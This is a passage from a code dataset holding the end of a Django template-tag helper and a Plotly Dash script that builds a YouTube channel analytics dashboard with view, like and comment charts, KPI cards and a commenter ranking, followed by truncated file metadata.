AsTagOptions(core.Options):\n\n def __init__(self, meta, *args, **kwargs):\n super(AsTagOptions, self).__init__(meta=meta, *args, **kwargs)\n self.as_default = getattr(meta, 'as_default', None)\n if self.as_default:\n self.as_required = False\n else:\n self.as_required = getattr(meta, 'as_required', True)\n self.as_name = getattr(meta, 'as_name', 'as')\n\n def post_process(self):\n super(AsTagOptions, self).post_process()\n non_keyword_args = [name for name, arg in self.named_args.items()\n if not arg.keyword]\n if (self.as_name in non_keyword_args and\n self.as_name not in self.parent_args):\n raise template.TemplateSyntaxError(\n \"%s can not explicitly define an named argument called %r\" %\n (self.name, self.as_name))\n arg = args.BasicArg(required=self.as_required, named=True)\n arg.name = self.as_name\n self.named_args[self.as_name] = arg\n\n\nclass AsTagMetaclass(core.DeclarativeArgsMetaclass):\n options_class = AsTagOptions\n\n\n@six.add_metaclass(AsTagMetaclass)\nclass AsTag(core.BaseTag):\n\n def render(self, context):\n data = self.resolve(context)\n as_var = data.get(self._meta.as_name, self._meta.as_default)\n value = self.as_value(data, context)\n if as_var:\n context[as_var] = value\n return self.as_output(data, context)\n return value\n\n def 
as_value(self, data, context):\n return self.output(data)\n\n def as_output(self, data, context):\n return ''\n", "repo_name": "michaltomaszewski1/projekt-web", "sub_path": "venv/Lib/site-packages/ttag/helpers/as_tag.py", "file_name": "as_tag.py", "file_ext": "py", "file_size_in_byte": 1689, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ttag.core.Options", "line_number": 7, "usage_type": "attribute"}, {"api_name": "ttag.core", "line_number": 7, "usage_type": "name"}, {"api_name": "ttag.args", "line_number": 10, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 24, "usage_type": "call"}, {"api_name": "django.template", "line_number": 24, "usage_type": "name"}, {"api_name": "ttag.args.BasicArg", "line_number": 27, "usage_type": "call"}, {"api_name": "ttag.args", "line_number": 27, "usage_type": "name"}, {"api_name": "ttag.core.DeclarativeArgsMetaclass", "line_number": 32, "usage_type": "attribute"}, {"api_name": "ttag.core", "line_number": 32, "usage_type": "name"}, {"api_name": "ttag.core.BaseTag", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ttag.core", "line_number": 37, "usage_type": "name"}, {"api_name": "six.add_metaclass", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "522197529", "text": "#%%\nimport numpy as np\nfrom dash import Dash, dcc, html, Output, Input\nimport dash_bootstrap_components as dbc \nimport plotly.express as px\nimport pandas as pd \nfrom matplotlib import pyplot as plt\nimport datetime as dt\nimport time\nfrom dash import dash_table\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom sklearn.decomposition import PCA\nimport seaborn as sns\n# %%\ndf = pd.read_csv(\"D:\\Machine_Learning\\Hand_Writing_Humphrey\\Plotly_Practice\\plotly_practice\\留言測試_2022_08_15.csv\")\ndf = df.drop(\"Unnamed: 0\",axis=1)\n\n#%%\n# Counting The Total Videos\ndef value_comma(number):\n return (\"{:,}\".format(number))\n\ndf_count_video=df.copy()\ndf_count_video['Published_date']=pd.to_datetime(df_count_video['Published_date'])\ndf_card_1_name='影片數量'\ndf_card_1_name_eng='Published Videos'\ndf_count_video_ids=df_count_video['Title'].nunique()\ndf_count_video_ids=value_comma(df_count_video_ids)\n\n# Summary of Video Table\ndf_vidoe_summary=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_vidoe_summary_select=df_vidoe_summary.loc[:,['video_id','Title','Published_date','Views','like_x','comments','duration']]\n# Count Total Views\ndf_card_2_name='總觀看次數'\ndf_card_2_name_eng='Total Views'\ndf_count_total_views=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_total_views=df_count_total_views['Views'].sum()\ndf_count_total_views=value_comma(df_count_total_views)\n\n# Count Total Likes\ndf_card_3_name='總按讚次數'\ndf_card_3_name_eng='Total Views'\ndf_count_total_likes=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_total_likes=df_count_total_likes['like_x'].sum()\ndf_count_total_likes=value_comma(df_count_total_likes)\n\n# Count Total Comments\ndf_card_4_name='總留言次數'\ndf_card_4_name_eng='Total Comments'\ndf_count_total_comments=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_total_comments=df_count_total_comments['comments'].sum()\ndf_count_total_comments=value_comma(df_count_total_comments)\n\n# Show Original Table\ndf_count_video_ids_date=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_video_ids_date['year'] = 
pd.DatetimeIndex(df_count_video_ids_date['Published_date']).year\ndf_df_count_video_ids_date_datatable=df_count_video_ids_date.loc[:,['year','Published_date','video_id','Title','Views','like_x','comments','duration']]\ndf_df_count_video_ids_date_datatable.Published_date = pd.DatetimeIndex(df_df_count_video_ids_date_datatable.Published_date).strftime(\"%Y-%m-%d\")\n#df_df_count_video_ids_date_datatable.loc[:, 'Views'] =df_df_count_video_ids_date_datatable['Views'].map('{:,.0f}'.format)\n#df_df_count_video_ids_date_datatable.loc[:, 'like_x'] =df_df_count_video_ids_date_datatable['like_x'].map('{:,.0f}'.format)\n#df_df_count_video_ids_date_datatable.loc[:, 'comments'] =df_df_count_video_ids_date_datatable['comments'].map('{:,.0f}'.format)\n\n# Comment Summary and rank\ndf_count_video_comment_user_count=df_count_video\ndf_count_video_comment_user_count=df_count_video_comment_user_count.groupby('Name').count().sort_values('comments',ascending=False)\ndf_count_video_comment_user_count=df_count_video_comment_user_count.loc[:,['comments']]\ndf_count_video_comment_detail=df_count_video\ndf_count_video_comment_summary=df_count_video_comment_detail.merge(df_count_video_comment_user_count,how='inner',on='Name').drop_duplicates(subset='Name',keep='first').sort_values(by='comments_y',ascending=False)\n\n#%%\ndef drawText(card_name,card_name_eng,value):\n card=dbc.CardBody([\n html.Div([\n html.H5(card_name),\n html.H6(card_name_eng),\n html.H3(value,style={\"color\":'#FF2D2B'})\n ], style={'textAlign': 'center'}, className='cardbody') \n ])\n return(card)\n\ndef drawText_2(card_name,card_name_eng):\n card=html.Div([\n html.Span(card_name, style={'align': 'left','font-weight': 'bold','font-size':'18px',\"color\":'#C0FF6B'},className='cardbody_s3_name'),\n html.Br(),\n html.Span(card_name_eng, style={'textAlign': 'left','font-size':'0.83em',\"color\":'#C0FF6B'},className='cardbody_s3_name_eng')\n ], className='cardbody_s3') \n return(card)\ndef drawText_3(value):\n card=html.Div([\n html.Span(value)\n ], className='cardbody_s3_value',style={'textAlign': 'center','margin':'auto'}) \n return(card)\n\ndef unixTimeMillis(dt):\n ''' Convert datetime to unix timestamp '''\n return int(time.mktime(dt.timetuple()))\n\ndef unixToDatetime(unix):\n ''' Convert unix timestamp to datetime. 
'''\n return pd.to_datetime(unix,unit='s')\n\n#%%\n#Build your components \napp = Dash(__name__, external_stylesheets=[dbc.themes.CYBORG])\ndate=dt.datetime.today().strftime(\"%Y/%m/%d\")\nBig_Title=html.H3('頻道戰指中心', style={\"color\": \"white\",'text-align':'center'})\nSmall_Title=html.H5('YouTube Combat Information Center', style={\"color\": \"#C0FF6B\",'text-align':'center'})\nChannel_logo=html.Img(src=app.get_asset_url('press_play_logo.jpeg'),width=100)\nYouTube_logo=html.Img(src=app.get_asset_url('YouTube_icon.png'),width=100)\nmytitle = dcc.Markdown(children='')\nfig_layout = {'title': 'Dash Data Visualization'}\nselected_year=df_count_video_ids_date['year'].unique()\nviews_graph = dcc.Graph(id=\"views\")\nlikes_graph = dcc.Graph(id=\"likes\")\ndropdown = dcc.Dropdown(df_count_video_ids_date.year.unique(),\n id=\"dropdown\",\n value=2022,\n optionHeight=55,\n clearable=False)\ndatatable=dash_table.DataTable(\n id='datatable-comment',\n columns=[\n {\"name\": i, \"id\": i, \"deletable\": False, \"selectable\": True, \"hideable\": False}\n if i == \"video_id\"\n else {\"name\": i, \"id\": i, \"deletable\": False, \"selectable\": False}\n for i in df_df_count_video_ids_date_datatable.columns],\n data=df_df_count_video_ids_date_datatable.to_dict('records'), # the contents of the table\n editable=False, # allow editing of data inside all cells\n filter_action='none', # allow filtering of data by user ('native') or not ('none')\n sort_action=\"native\", # enables data to be sorted per-column by user or not ('none')\n sort_mode=\"single\", # sort across 'multi' or 'single' columns\n column_selectable=False, # allow users to select 'multi' or 'single' columns\n row_selectable=False, # allow users to select 'multi' or 'single' rows\n row_deletable=False, # choose if user can delete a row (True) or not (False)\n selected_columns=[], # ids of columns that user selects\n selected_rows=[], # indices of rows that user selects\n page_action=\"native\", # all data is passed to the table up-front or not ('none')\n page_current=0, # page number that user is on\n page_size=8, # number of rows visible per page\n style_cell={ # ensure adequate header width when text is shorter than cell's text\n 'width': 0\n },\n style_cell_conditional=[\n {\n 'if': {'column_id': c},\n 'textAlign': 'left'\n } for c in ['Title']]+[\n {\n 'if': {'column_id': b},\n 'textAlign': 'center'\n } for b in ['year','Published_date','video_id']\n ],\n \n style_data={\n 'color': 'black',\n 'backgroundColor': 'white',\n 'font_size': '18px'\n },\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': '#93E9BE',\n }\n ],\n style_header={\n 'backgroundColor': 'black',\n 'color': 'white',\n 'font_size': '18px'\n }\n )\ndatatable_drop_down=dcc.Dropdown(\n id=\"datatable_drop_down\",\n options=df_df_count_video_ids_date_datatable.year.unique(),\n value=2022,\n clearable=False\n )\ndatatable_graph = dcc.Graph(id=\"table_graph\")\ndatatable_check=dcc.Checklist(\n id=\"table_checklist\",\n options=['Views','like_x','comments'],\n value=['Views','like_x','comments'],\n inline=True)\n\n#--------------------\n#X = df_df_count_video_ids_date_datatable[['Views', 'like_x', 'comments']]\n\n#pca = PCA(n_components=3)\n#components = pca.fit_transform(X)\n#total_var = pca.explained_variance_ratio_.sum() * 100\n#fig_test_1 = px.scatter_3d(\n #components, x=0, y=1, z=2,\n #title=f'Total Explained Variance: {total_var:.2f}%',\n #labels={'0': 'PC 1', '1': 'PC 2', '2': 'PC 3'}\n#)\n#-------------------\n\n#Section_3 
KPI\ndf_card_wait_name='重要指標'\ndf_card_wait_name_eng='Critical KPI'\ndf_card_wait_value='Waiting Data'\n\ndf_card_s3_1_name='年度發片數量'\ndf_card_s3_1_name_eng='Published Videos'\ndf_card_s3_1_value=html.Span(id='s3_1_value',className='cardbody_s3_value')\n\ndf_card_s3_2_name='年度觀看次數'\ndf_card_s3_2_name_eng='Total Views'\ndf_card_s3_2_value=html.Span(id='s3_2_value',className='cardbody_s3_value')\n\ndf_card_s3_3_name='年度按讚次數'\ndf_card_s3_3_name_eng='Total Likes'\ndf_card_s3_3_value=html.Span(id='s3_3_value',className='cardbody_s3_value')\n\ndf_card_s3_4_name='年度留言次數'\ndf_card_s3_4_name_eng='Total Comments'\ndf_card_s3_4_value=html.Span(id='s3_4_value',className='cardbody_s3_value')\n\ndf_card_s3_5_name='年度平均片長'\ndf_card_s3_5_name_eng='Average Duration'\ndf_card_s3_5_value=html.Span(id='s3_5_value',className='cardbody_s3_value')\n\ndf_card_s3_6_name='平均觀看次數'\ndf_card_s3_6_name_eng='Average Views'\ndf_card_s3_6_value=html.Span(id='s3_6_value',className='cardbody_s3_value')\n\ndf_card_s3_7_name='平均按讚次數'\ndf_card_s3_7_name_eng='Average Likes'\ndf_card_s3_7_value=html.Span(id='s3_7_value',className='cardbody_s3_value')\n\ndf_card_s3_8_name='平均留言次數'\ndf_card_s3_8_name_eng='Average Comments'\ndf_card_s3_8_value=html.Span(id='s3_8_value',className='cardbody_s3_value')\n\n\n# Section 4\ndatatable_comment_rank=dash_table.DataTable(\n id='datatable-comment_rank',\n columns=[\n {\"name\": 'Name', \"id\": 'Name', \"deletable\": False, \"selectable\": True, \"hideable\": False},\n {\"name\": 'Comments_Count', \"id\": 'comments_y', \"deletable\": False, \"selectable\": True, \"hideable\": False}],\n data=df_count_video_comment_summary.to_dict('records'), # the contents of the table\n editable=False, # allow editing of data inside all cells\n filter_action='none', # allow filtering of data by user ('native') or not ('none')\n sort_action=\"native\", # enables data to be sorted per-column by user or not ('none')\n sort_mode=\"single\", # sort across 'multi' or 'single' columns\n column_selectable=False, # allow users to select 'multi' or 'single' columns\n row_selectable=False, # allow users to select 'multi' or 'single' rows\n row_deletable=False, # choose if user can delete a row (True) or not (False)\n selected_columns=[], # ids of columns that user selects\n selected_rows=[], # indices of rows that user selects\n page_action=\"native\", # all data is passed to the table up-front or not ('none')\n page_current=0, # page number that user is on\n page_size=12, # number of rows visible per page\n style_cell={ # ensure adequate header width when text is shorter than cell's text\n 'width': 0\n },\n style_cell_conditional=[\n {\n 'if': {'column_id': c},\n 'textAlign': 'left'\n } for c in ['Title']]+[\n {\n 'if': {'column_id': b},\n 'textAlign': 'center'\n } for b in ['year','Published_date','video_id']\n ],\n \n style_data={\n 'color': 'black',\n 'backgroundColor': 'white',\n 'font_size': '18px'\n },\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': '#93E9BE',\n }\n ],\n style_header={\n 'backgroundColor': 'black',\n 'color': 'white',\n 'font_size': '18px'\n }\n )\n# Comments Ranking\ndf_count_video_comment_summary_top_15=df_count_video_comment_summary.sort_values(by='comments_y',ascending=False).head(15)\ncomments_ranking = px.bar(df_count_video_comment_summary_top_15, y='comments_y', x='Name', text_auto='.2s',\n title=\"留言排行榜
Comments Ranking\")\ncomments_ranking=comments_ranking.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title_font_color='#ffffff',\n font_color='#ffffff')\n#Corrlation Analysis\ncorr=df_vidoe_summary_select.corr()\ncorr_fig=px.imshow(corr,color_continuous_scale='ylgnbu',text_auto=True)\ncorr_fig=corr_fig.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '相關係數
Correlation',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff')\n# Customize your own Layout\napp.layout = html.Div([\n html.Div([\n html.Br(),\n html.Br(),\n dbc.Row([\n dbc.Col([Channel_logo,YouTube_logo],className='logo'), \n dbc.Col([Big_Title,Small_Title],className='title'),\n dbc.Col([])\n ])\n ],className='header'),\n \n html.Br(),\n \n html.Div([\n html.H5(\n [html.Span('頻道名稱 (Channel):',className = 'channel_tw'),\n html.Span('Press Play',className = 'channel_eng')]),\n html.H6(\n [html.Span('當前日期 (Current Date):',className = 'channel_tw'),\n html.Span(date, className = 'channel_eng'),], style={'text-align':'left'}),\n ]),\n \n html.Div([ \n dbc.Row([\n dbc.Col([dbc.Card(drawText(df_card_1_name,df_card_1_name_eng,df_count_video_ids))]),\n dbc.Col([dbc.Card(drawText(df_card_2_name,df_card_2_name_eng,df_count_total_views))]),\n dbc.Col([dbc.Card(drawText(df_card_3_name,df_card_3_name_eng,df_count_total_likes))]),\n dbc.Col([dbc.Card(drawText(df_card_4_name,df_card_4_name_eng,df_count_total_comments))])\n ]), \n ]),\n \n html.Br(),\n \n html.Div([\n html.Div([\n dbc.Row([\n html.H6(['查詢年份'],className='dropdown_text'),\n html.H6(['Please select the year:'],className='dropdown_text'),\n dbc.Col([dropdown], className='dropdown', width=3)])\n ],className='dropdown_1'),\n html.Div([\n dbc.Row([\n dbc.Col([views_graph], width=6,className='views_graph'),\n dbc.Col([likes_graph], width=6,className='likes_graph')])\n ],className='chart_1')\n ],className='chart_section_1'),\n \n html.Br(),\n \n html.Div([\n html.Div([\n html.H5([html.Span('紀錄總覽', className='section_title'),\n html.Br(),\n html.Span('Data Table', className='channel_eng'),\n ], style={'text-align':'center'})\n ],className='dropdown_2'),\n \n html.Div([\n dbc.Row([\n html.H6(['查詢年份'],className='dropdown_text'),\n html.H6(['Please select the year:'],className='dropdown_text'),\n dbc.Col([datatable_drop_down],className='dropdown', width=3)]),\n dbc.Row(dbc.Col([datatable],width={\"size\": 12}))\n ],className='datatable_1')\n ],className='chart_section_2'),\n \n html.Br(),\n \n html.Div([\n html.Div([\n dbc.Row([\n dbc.Col([datatable_graph],className='datatable_graph',width=6),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_1_name,df_card_s3_1_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_1_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_2_name,df_card_s3_2_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_2_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_3_name,df_card_s3_3_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_3_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n 
dbc.Col([dbc.CardBody(drawText_2(df_card_s3_4_name,df_card_s3_4_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_4_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n ],width=3),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_5_name,df_card_s3_5_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_5_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_6_name,df_card_s3_6_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_6_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_7_name,df_card_s3_7_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_7_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_8_name,df_card_s3_8_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_8_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n ],width=3)\n ])\n ])\n ]),\n \n html.Br(),\n \n html.Div([\n html.Div([\n html.H5([html.Span('觀眾分析', className='section_title'),\n html.Br(),\n html.Span('Audience Analysis', className='channel_eng'),\n ], style={'text-align':'center'})\n ],className='section_title')\n ],className='section4'),\n \n html.Div([\n dbc.Row([\n dbc.Col([datatable_comment_rank],width=3,className='datatable_2'),\n dbc.Col(dcc.Graph(figure=comments_ranking),width=6,className='comments_ranking'),\n dbc.Col(dcc.Graph(figure=corr_fig),width=3,className='corr_fig')])\n ]),\n \n\n \n #html.Div([\n #html.Div([\n #dcc.Graph(figure=fig_test_1)\n #])\n #])\n])\n\n\n\n# Callback allows components to interact\n@app.callback(Output(component_id=\"views\",component_property= \"figure\"),\n [Input(component_id=\"dropdown\", component_property=\"value\")])\ndef update_chart(value):\n df=df_count_video_ids_date\n df_selected_year=df['year']==value\n df_selected_year=df[df_selected_year] \n fig_1 = px.line(df_selected_year, \n x='Published_date', \n y=\"Views\")\n fig_1.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '觀看次數時序圖
Views With Time Sequence',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff',\n xaxis=dict(showline=True,\n showgrid=False,\n tickfont=dict(color='#ffffff')),\n yaxis=dict(tickfont=dict(color='#ffffff')),\n )\n fig_1.update_layout(xaxis_rangeslider_visible=True)\n return fig_1\n \n \n@app.callback(Output(component_id=\"likes\",component_property= \"figure\"),\n [Input(component_id=\"dropdown\", component_property=\"value\")])\ndef update_likes_chart(value):\n df=df_count_video_ids_date\n df_selected_year=df['year']==value\n df_selected_year=df[df_selected_year] \n fig_2 = px.bar(df_selected_year,\n x='Published_date',\n y=\"like_x\", \n color='like_x')\n fig_2.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '按讚時序圖
Likes With Time Sequence',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff',\n xaxis=dict(showline=True,\n showgrid=False,\n tickfont=dict(color='#ffffff')),\n yaxis=dict(tickfont=dict(color='#ffffff')),\n )\n fig_2.update_layout(xaxis_rangeslider_visible=True)\n return fig_2\n\n@app.callback(\n Output(\"datatable-comment\", \"data\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_table(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n return dff_selected_year.to_dict(\"records\")\n\n@app.callback(\n Output(\"table_graph\", \"figure\"), \n Input(\"datatable_drop_down\", \"value\"))\ndef update_line_chart(value):\n df=df_count_video_ids_date\n df_selected_year=df['year']==value\n df_selected_year=df[df_selected_year]\n \n fig_3 = go.Figure()\n fig_3.add_trace(go.Scatter(x=df_selected_year['Published_date'], \n y=df_selected_year['Views'],\n mode='lines+markers',\n name='Views'))\n fig_3.add_trace(go.Scatter(x=df_selected_year['Published_date'], \n y=df_selected_year['like_x'],\n mode='lines+markers',\n name='Like'))\n fig_3.add_trace(go.Scatter(x=df_selected_year['Published_date'], \n y=df_selected_year['comments'],\n mode='lines+markers',\n name='Comments'))\n\n fig_3.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '數據疊加圖
Data Table Chart',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff',\n xaxis=dict(showline=True,\n showgrid=False,\n tickfont=dict(color='#ffffff')),\n yaxis=dict(tickfont=dict(color='#ffffff')),\n )\n fig_3.update_layout(xaxis_rangeslider_visible=True)\n return fig_3\n\n\n@app.callback(\n Output(\"s3_1_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_1_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['video_id'].count()\n return value_comma(dff_selected_year_video_sum)\n\n\n@app.callback(\n Output(\"s3_2_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_2_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['Views'].sum()\n return value_comma(dff_selected_year_video_sum)\n\n@app.callback(\n Output(\"s3_3_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_3_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['like_x'].sum()\n return value_comma(dff_selected_year_video_sum)\n\n@app.callback(\n Output(\"s3_4_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_4_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['comments'].sum()\n return value_comma(dff_selected_year_video_sum)\n\n@app.callback(\n Output(\"s3_5_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_5_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year['duration'] = pd.to_datetime(dff_selected_year['duration']).dt.time.astype(str)\n tsum = dt.timedelta()\n count = 0\n for single_time in dff_selected_year['duration']:\n t = dt.datetime.strptime(single_time,'%H:%M:%S')\n tdelta = dt.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second, microseconds=t.microsecond)\n tsum = tsum + tdelta\n count = count + 1\n taverage = tsum / count\n average_time = str(taverage).split(\".\")[0]\n return average_time\n\n@app.callback(\n Output(\"s3_6_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_6_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_mean=dff_selected_year['Views'].mean()\n return value_comma(dff_selected_year_video_mean).split(\".\")[0]\n\n@app.callback(\n Output(\"s3_7_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_7_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_mean=dff_selected_year['like_x'].mean()\n return value_comma(dff_selected_year_video_mean).split(\".\")[0]\n\n@app.callback(\n Output(\"s3_8_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_8_value(value):\n dff = df_df_count_video_ids_date_datatable\n 
dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_mean=dff_selected_year['comments'].mean()\n return value_comma(dff_selected_year_video_mean).split(\".\")[0]\n\n# Run app\nif __name__=='__main__':\n app.run_server(debug=False)\n\n\n\n# %%\n\n\n# %%\n", "repo_name": "humphreyshen/War_Room", "sub_path": "01_War_Room.py", "file_name": "01_War_Room.py", "file_ext": "py", "file_size_in_byte": 29371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 59, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 73, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 74, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 74, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 75, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 75, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 76, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 76, "usage_type": "name"}, {"api_name": "dash.html.H3", "line_number": 77, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 77, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 83, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 83, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 84, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 84, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 85, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 85, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 86, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 86, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 90, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 90, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 91, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 91, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 97, "usage_type": "call"}, {"api_name": "datetime.timetuple", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 101, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 105, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.themes", "line_number": 105, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 106, "usage_type": "attribute"}, {"api_name": "dash.html.H3", "line_number": 107, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 107, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 108, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 108, "usage_type": "name"}, {"api_name": "dash.html.Img", "line_number": 109, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 109, "usage_type": "name"}, {"api_name": "dash.html.Img", "line_number": 110, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 110, "usage_type": "name"}, {"api_name": "dash.dcc.Markdown", "line_number": 111, 
